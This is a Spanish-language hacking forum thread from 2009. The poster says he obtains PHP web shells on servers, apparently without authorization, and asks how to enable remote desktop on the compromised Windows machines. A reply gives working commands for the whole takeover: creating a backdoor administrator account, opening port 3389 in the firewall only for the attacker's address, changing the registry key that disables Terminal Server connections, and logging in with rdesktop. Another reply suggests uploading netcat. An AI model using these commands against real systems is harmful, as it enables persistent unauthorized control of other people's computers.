elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Acceso Remoto (habilitarlo por CMD)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Acceso Remoto (habilitarlo por CMD)  (Leído 31,469 veces)
ANTiSPY

Desconectado Desconectado

Mensajes: 3


Support Our Troops!!!


Ver Perfil
Acceso Remoto (habilitarlo por CMD)
« en: 25 Noviembre 2009, 07:54 am »

Hola chicos, primeramente gracias por leer mi post ^^

segundo, les planteo mi caso

ando sacando php shells (las saco con exito)

siguiente, algunas son unix (perfecto) otras son windows, algunas d las windowss tienen la opcion de recibir axx remoto habilitado, asi que desde la php shell les tiro un comando "net user..." me creo el comando y ya tengo mi usuario en la maquina ;) (todo perfecto)

pero algunas de esas windows no tienen el axx para recibir conexiones remotas activadas.... mi pregunta es la siguiente

hay forma de, por algun comando en CMD, activar esa opcion en windows para habilitar las conexiones remotas a este ekipo, para poder loguearme?

(y de paso les dejo un bonus XD... ando buscando algun source o soft para las unix que me deje racearle, osea enviarle de otro ftp a las unix [via ftp] archivos, porque normalmente solo me deja enviarle por via ftp, archivos desde mi pc a ellas, no dejan pasarles archivo de ftp a ftp)

saludos!  :)
En línea

Pyr0s

Desconectado Desconectado

Mensajes: 57


c0der's


Ver Perfil
Re: Acceso Remoto (habilitarlo por CMD)
« Respuesta #1 en: 25 Noviembre 2009, 08:05 am »

Bueno espero que te sirva, podrias subirle el NC abrir el puerto que quieras y conectarte con Putty, una vez tengas la shell pones:

Net User Hacker Hacker

Le das permisos de Admin y con algun Software de conexion remota te conectas con su IP y tu User/Pass a su PC y como tienes nivel Admin podras hacer lo que quieras  :D

De todos modos te dejo un video que seguro quee sta mejor explicado, el video se trata de rootear una web pero creo que a ti te vale igual  ;)

http://milw0rm.com/video/watch.php?id=33

Mas o menos he seguido los pasos del video para explicartelo  ;D

Y en cuanto a tu segunda pregunta no te he entendido muy bien, de todos modos no se si se puede  :-\

Espero que te sirva el video.

Saludos!

En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Acceso Remoto (habilitarlo por CMD)
« Respuesta #2 en: 25 Noviembre 2009, 13:03 pm »

bueno, vas en el buen camino, vamos a suponer que has conseguido una shell con privilegios de admin, los pasos que más o menos debes seguir para conseguir acceso a escritorio remoto:

Primero , vamos a crearnos un usuario (ANTiSPY:ANTiSPY) y lo vamos a meter en el grupo "Administradores" y "Usuarios de escritorio remoto", para que podamos entrar por RDP y desde ahí tener todos los privilegios que podamos necesitar sobre la máquina

Código:
>net user ANTiSPY ANTiSPY /add
Código:
>net localgroup Administradores ANTiSPY /add
Código:
>net localgroup "Usuarios de escritorio remoto" ANTiSPY /add


Ahora, es posible que tengamos filtrado el puerto de Terminal Server (3389/TCP), para comprobarlo bastará con un simple escaneo con NMap...
Si es así, vamos a tener que desactivar el firewall, o mejor aún, crear una excepción para nuestra IP de origen, así sólo nosotros tendremos acceso al Terminal Server y nadie más podrá aprovechar nuestro trabajo para entrar en la máquina:

Código:
>netsh firewall add portopening protocol = TCP port = 3389 name = RDP mode = ENABLE scope = CUSTOM addresses = xx.xx.xx.xx


Si ahora hacemos un nuevo escaneo, veremos que...el puerto ha pasado de filtrado a cerrado, eso quiere decir que el firewall ha sido desactivado correctamente, aunque seguimos sin poder conectar porque no hay un servicio a la escucha. Esto es debido a que hay que modificar una clave de registro (en los Windows XP al menos, supongo que en los Server será parecido, pero no te lo aseguro) para poder activar la administración remota. Hagámoslo:

Código:
>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


ya solo tenemos que acceder y probar la contraseña que hemos configurado a ver si todo el proceso anterior ha surtido efecto:

Código:
# rdesktop xx.xx.xx.xx


Este proceso tiene algunas "pegas", la principal es que puede haber más firewalls en el sistema (firewalls en la red, no en el mismo sistema), la solución sería fácil, hacer una conexión inversa y que sea el Sistema el que se conecte con nosotros...
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Darioxhcx


Desconectado Desconectado

Mensajes: 2.292


Ver Perfil
Re: Acceso Remoto (habilitarlo por CMD)
« Respuesta #3 en: 27 Noviembre 2009, 03:04 am »

Hola chicos, primeramente gracias por leer mi post ^^

segundo, les planteo mi caso

ando sacando php shells (las saco con exito) ....
De Verdad Soy Nuevo En Esto Pero Una Duda Como Se Saca El Php Shells Alguna Ayuda plz
que wtf ?


kamsky
sos groso... sabelo
:P
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Acceso Remoto (habilitarlo por CMD)
« Respuesta #4 en: 27 Noviembre 2009, 12:24 pm »

groso?¿?¿eso es bueno o malo???   :laugh: :xD
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Darioxhcx


Desconectado Desconectado

Mensajes: 2.292


Ver Perfil
Re: Acceso Remoto (habilitarlo por CMD)
« Respuesta #5 en: 27 Noviembre 2009, 17:46 pm »

bueno :xD
En línea

ANTiSPY

Desconectado Desconectado

Mensajes: 3


Support Our Troops!!!


Ver Perfil
Re: Acceso Remoto (habilitarlo por CMD)
« Respuesta #6 en: 4 Diciembre 2009, 03:30 am »

epa =)

muxas gracias bro! :D


me parecio muy util tu info!

de verdad muxas gracias ;D

cualkier kosa... dejo un hilo, otro msg aki en el post XD

saludos.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines